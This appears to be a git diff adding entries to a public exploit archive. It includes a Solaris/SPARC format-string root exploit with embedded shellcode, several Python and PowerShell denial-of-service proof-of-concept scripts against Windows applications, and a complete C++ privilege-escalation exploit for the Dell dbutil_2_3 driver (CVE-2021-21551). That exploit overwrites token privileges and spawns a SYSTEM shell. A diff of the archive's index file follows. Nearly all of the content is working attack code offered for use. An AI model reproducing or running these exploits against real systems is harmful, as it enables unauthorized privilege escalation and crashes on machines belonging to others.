char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */
/* chmod("./me", 037777777777) */
"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
"\x20\xbf\xff\xff" /* bn,a <sc - 4> */
"\x20\xbf\xff\xff" /* bn,a <sc> */
"\x7f\xff\xff\xff" /* call <sc + 4> */
"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */
"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */
"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"./me";
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf, buf2[BUFSIZE2];
char platform[256], release[256], display[256];
int retloc = LIBCBASE + STRLEN;
int i, stackpops = STACKPOPS;
unsigned base, n[strlen(sc)]; /* must be unsigned */
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if (argc < 2) {
fprintf(stderr, "usage:\n$ %s xserver:display [retloc]\n$ /bin/ksh\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
if (argc > 2)
retloc = (int)strtoul(argv[2], (char **)NULL, 0);
/* evil env var: name + shellcode + padding */
bzero(buf, sizeof(buf));
memcpy(buf, "REQ_DIR=", strlen("REQ_DIR="));
p += strlen("REQ_DIR=");
/* padding buffer to avoid stack overflow */
memset(buf2, 'B', sizeof(buf2));
buf2[sizeof(buf2) - 1] = 0x0;
/* fill the envp, keeping padding */
add_env(buf2);
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp/just"); /* we must control this empty dir */
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* format string: retloc */
for (i = retloc; i - retloc < strlen(sc); i += 4) {
check_zero(i, "ret location");
*((void **)p) = (void *)(i); p += 4; /* 0x000000ff */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i); p += 4; /* 0x00ff0000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i); p += 4; /* 0xff000000 */
memset(p, 'A', 4); p += 4; /* dummy */
*((void **)p) = (void *)(i + 2); p += 4; /* 0x0000ff00 */
memset(p, 'A', 4); p += 4; /* dummy */
}
/* format string: stackpop sequence */
base = p - buf - strlen("REQ_DIR=");
for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
memcpy(p, STACKPOPSEQ, strlen(STACKPOPSEQ));
/* calculate numeric arguments */
for (i = 0; i < strlen(sc); i += 4)
CALCARGS(n[i], n[i + 1], n[i + 2], n[i + 3], sc[i], sc[i + 1], sc[i + 2], sc[i + 3], base);
/* check for potentially dangerous numeric arguments below 10 */
for (i = 0; i < strlen(sc); i++)
n[i] += (n[i] < 10) ? (0x100) : (0);
/* format string: write string */
for (i = 0; i < strlen(sc); i += 4)
p += sprintf(p, "%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn", n[i], n[i + 1], n[i + 2], n[i + 3]);
/* setup the directory structure and the symlink to /bin/ksh */
unlink("/tmp/just/chmod/me");
rmdir("/tmp/just/chmod");
rmdir("/tmp/just");
mkdir("/tmp/just", S_IRWXU | S_IRWXG | S_IRWXO);
mkdir("/tmp/just/chmod", S_IRWXU | S_IRWXG | S_IRWXO);
symlink("/bin/ksh", "/tmp/just/chmod/me");
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using libc/.plt/strlen\t: 0x%p\n\n", (void *)retloc);
fprintf(stderr, "Don't worry if you get a SIGILL, just run /bin/ksh anyway!\n\n");
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "error: %s contains a 0x00!\n", pattern);
exit(1);
}
}

29
exploits/windows/dos/49566.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://switchportmapper.com/
# Software Link: https://switchportmapper.com/download.htm
# Version: 2.85.2
# Tested on: Windows 10 Home x64
#STEPS
# Open the program Managed Switch Port Mapping Tool
# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches)
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name
# Click in OK
# End :)
buffer = 'F' * 10000
try:
file = open("Gou2.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

27
exploits/windows/dos/49567.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: http://agatasoft.com/
# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
# Version: 2.1
# Tested on: Windows 10 Home x64
#STEPS
# Open the program AgataSoft PingMaster Pro
# In Tools select the option Trace Route
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field Host name and click in Get IP from host name
# End :)
buffer = 'S' * 10000
try:
file = open("Gou.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

29
exploits/windows/dos/49568.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.2.0
# Tested on: Windows 10 Home x64
#STEPS
# Open the program Nsauditor
# In Options select Configuration...
# Click in Security Events
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Liella.txt"
# Paste the content in the field Event Description and click in Add Event
# End :)
buffer = 'U' * 10000
try:
file = open("Liella.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

30
exploits/windows/dos/49590.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-23
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Version: 4.2.7
# Tested on: Windows 7 x64
# Steps:
1- Run the python script. (exploit.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Product Key Explorer 4.2.7'.
4- Register -> Enter Registration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.
---> exploit.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print "File created!"
except:
print "File cannot be created!!"

18
exploits/windows/dos/49844.py Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
# Date: 06/05/2021
# Author: Erick Galindo
# Vendor Homepage: https://sandboxie-plus.com/
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
# Version: 5.49.7
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Sandboxie Control->Sandbox->Set Container Folder
#3.- Paste the buffer in the input then press ok
buffer = "\x41" * 5000
f = open ("Sandboxie10.txt", "w")
f.write(buffer)
f.close()

30
exploits/windows/dos/49898.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: iDailyDiary 4.30 - Denial of Service (PoC)
# Date: 2021-05-21
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.splinterware.com/index.html
# Software Link: https://www.splinterware.com/download/iddfree.exe
# Version: 4.30
# Tested on: Windows 10 Home x64
#STEPS
# Open the program iDailyDiary
# Create a New Diary, put any name and check the option "Do not prompt for password", click in OK
# In the tab "View", click in "Preferences"
# Click in the option "Tabs"
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Sotsu.txt"
# Paste the content in the field below "Default diary tab name when creating new tabs"
# Click in Apply
# End :)
buffer = 'F' * 2000000
try:
file = open("Sotsu.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

29
exploits/windows/dos/49906.py Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
# Date: 2021-05-25
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
# Version: 2.75.8
# Tested on: Windows 10 Home x64
#STEPS
# Open the program RarmaRadio
# Click in Edit and select Settings
# Click in Network option
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Lambda.txt"
# Paste the content in the fields Username, Server, Port and User Agent
# Click in OK
# End :)
buffer = 'Ñ' * 100000
try:
file = open("Lambda.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

27
exploits/windows/dos/49917.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
# Date: 2021-05-28
# Author: Brian Rodríguez
# Software Site: https://sourceforge.net/projects/dupterminator/
# Version: 1.4.5639.37199
# Category: DoS (Windows)
##### Vulnerability #####
DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.
Successful exploitation will causes application stop working.
I have been able to test this exploit against Windows 10.
##### PoC #####
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

36
exploits/windows/dos/50247.py Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC)
# Exploit Author: Aryan Chehreghani
# Date: 2021-08-30
# Vendor Homepage: https://telegram.org
# Software Link: https://telegram.org/dl/desktop/win64
# Tested Version: 2.9.2 x64
# Tested on OS: Windows 10 Enterprise
# [ About App ]
#Telegram is a messaging app with a focus on speed and security, its super-fast, simple and free,
#You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers.
#Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world.
#With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences.
#You can write to your phone contacts and find people by their usernames. As a result,
#Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs,
#Telegram is support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants.
# [ POC ]
# 1.Run the python script, it will create a new file "output.txt"
# 2.Run Telegram Desktop and go to "Saved Messages"
# 3.Copy the content of the file "output.txt"
# 4.Paste the content of dos.txt into the "Write a message..."
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 9000000
try:
f=open("output.txt","w")
print("[!] Creating %s bytes DOS payload...." %len(buffer))
f.write(buffer)
f.close()
print("[!] File Created !")
except:
print("File cannot be created")

45
exploits/windows/local/49882.ps1 Normal file
View file

@ -0,0 +1,45 @@
# Exploit Tittle: Visual Studio Code 1.47.1 - Denial of Service (Poc)
# Exploit Author: H.H.A.Ravindu Priyankara
# Category: Denial of Service(DOS)
# Tested Version:1.47.1
# Vendor: Microsoft
# Software Download Link:https://code.visualstudio.com/updates/
Write-Host "
* *
*-------------------------------------------------------------------------------------------------------*
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Tittle :-" -ForegroundColor Green -NoNewline; Write-Host " Visual Studio Code (VS Code) Denial of Service " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Author :-" -ForegroundColor Green -NoNewline; Write-Host " H.H.A.Ravindu.Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Github :-" -ForegroundColor Green -NoNewline; Write-Host " https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host " |
| |
|" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host " |
*-------------------------------------------------------------------------------------------------------*"-ForegroundColor Yellow
[string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-"
if ($Userinpts -eq "Run") {
Write-Output "Yeah I Know"
while ($True) {
$name = "AAAAAAA"
$name * 1000000
}
#or
#$name = "AAAAAAA"
#$name * 1000000
}
if ($Userinpts -eq "Stop") {
exit
}
#==========================================================
#==================== solution ============================
#==========================================================
#Update Your Visual Studio Code Application
# 1.47.1 version ==> 1.56.0 version
#==========================================================

219
exploits/windows/local/49893.c++ Normal file
View file

@ -0,0 +1,219 @@
# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
# Date: 10/05/2021
# Exploit Author: Paolo Stagno aka VoidSec
# Version: <= 2.3
# CVE: CVE-2021-21551
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/
#include <iostream>
#include <windows.h>
#include <winternl.h>
#include <tlhelp32.h>
#include <algorithm>
#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2
// define the buffer structure which will be sent to the vulnerable driver
typedef struct Exploit
{
uint64_t Field1; // "padding" can be anything
void* Field2; // where to write
uint64_t Field3; // must be 0
uint64_t Field4; // value to write
};
typedef struct outBuffer
{
uint64_t Field1;
uint64_t Field2;
uint64_t Field3;
uint64_t Field4;
};
// define a pointer to the native function 'NtQuerySystemInformation'
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
// define the SYSTEM_HANDLE_INFORMATION structure
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
int main(int argc, char** argv)
{
// open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
HANDLE device = ::CreateFileW(
L"\\\\.\\DBUtil_2_3",
GENERIC_WRITE | GENERIC_READ,
NULL,
nullptr,
OPEN_EXISTING,
NULL,
NULL);
if (device == INVALID_HANDLE_VALUE)
{
std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";
// resolve the address of NtQuerySystemInformation and assign it to a function pointer
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Resolved NtQuerySystemInformation!\n";
// open the current process token - it will be used to retrieve its kernelspace address later
HANDLE currentProcess = ::GetCurrentProcess();
HANDLE currentToken = NULL;
bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken);
if (!success)
{
std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Opened a handle to the current process token!\n";
// allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
// call NtQuerySystemInformation and fill the handleTableInformation structure
ULONG returnLength = 0;
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
uint64_t tokenAddress = 0;
// iterate over the system's handle table and look for the handles beloging to our process
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
{
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
// if it finds our process and the handle matches the current token handle we already opened, print it
if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken)
{
tokenAddress = (uint64_t)handleInfo.Object;
std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
}
}
outBuffer buffer =
{
0,
0,
0,
0
};
/*
dt nt!_SEP_TOKEN_PRIVILEGES
+0x000 Present : Uint8B
+0x008 Enabled : Uint8B
+0x010 EnabledByDefault : Uint8B
We've added +1 to the offsets to ensure that the low bytes part are 0xff.
*/
// overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
Exploit exploit =
{
0x4141414142424242,
(void*)(tokenAddress + 0x40),
0x0000000000000000,
0xffffffffffffffff
};
// overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
Exploit exploit2 =
{
0x4141414142424242,
(void*)(tokenAddress + 0x48),
0x0000000000000000,
0xffffffffffffffff
};
// overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
Exploit exploit3 =
{
0x4141414142424242,
(void*)(tokenAddress + 0x50),
0x0000000000000000,
0xffffffffffffffff
};
DWORD bytesReturned = 0;
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit,
sizeof(exploit),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'Present' field!\n";
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit2,
sizeof(exploit2),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";
success = DeviceIoControl(
device,
IOCTL_CODE,
&exploit3,
sizeof(exploit3),
&buffer,
sizeof(buffer),
&bytesReturned,
nullptr);
if (!success)
{
std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
std::cout << "[+] Token privileges successfully overwritten!\n";
std::cout << "[+] Spawning a new shell with full privileges!\n";
system("cmd.exe");
return 0;
}

24
exploits/windows/local/50401.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10
# [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
#E.g λ cmder.cmd
# [POC] :
PAYLOAD=chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)

1213
exploits/windows_x86-64/local/49863.js Normal file
View file

File diff suppressed because it is too large Load diff

83
files_exploits.csv
View file

@ -6757,6 +6757,7 @@ id,file,description,date,author,type,platform,port
48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",1970-01-01,"Saeed reza Zamanian",dos,windows, 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",1970-01-01,"Saeed reza Zamanian",dos,windows,
48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",1970-01-01,mostwanted002,dos,linux, 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",1970-01-01,mostwanted002,dos,linux,
49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows, 49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",1970-01-01,"Sinem Şahin",dos,windows,
48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",1970-01-01,"Felipe Winsnes",dos,windows, 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",1970-01-01,"Felipe Winsnes",dos,windows,
48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows, 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows, 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,windows,
@ -6769,19 +6770,33 @@ id,file,description,date,author,type,platform,port
49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows, 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple, 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",1970-01-01,"Guillaume PETIT",dos,multiple,
49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows, 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",1970-01-01,stresser,dos,windows,
49566,exploits/windows/dos/49566.txt,"Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware, 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",1970-01-01,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware, 49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",1970-01-01,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple, 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",1970-01-01,xynmaps,dos,multiple,
49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple, 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",1970-01-01,"Dolev Farhi",dos,multiple,
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",1970-01-01,"Dolev Farhi",dos,php,
49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",1970-01-01,"Luis Martínez",dos,ios,
49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",1970-01-01,"Ismael Nava",dos,windows,
49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",1970-01-01,"Brian Rodriguez",dos,windows,
49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, 49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows, 49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",1970-01-01,"Erick Galindo",dos,windows,
49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 49978,exploits/ios/dos/49978.py,"Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
49979,exploits/ios/dos/49979.py,"n+otes 1.6.2 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50001,exploits/ios/dos/50001.py,"Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
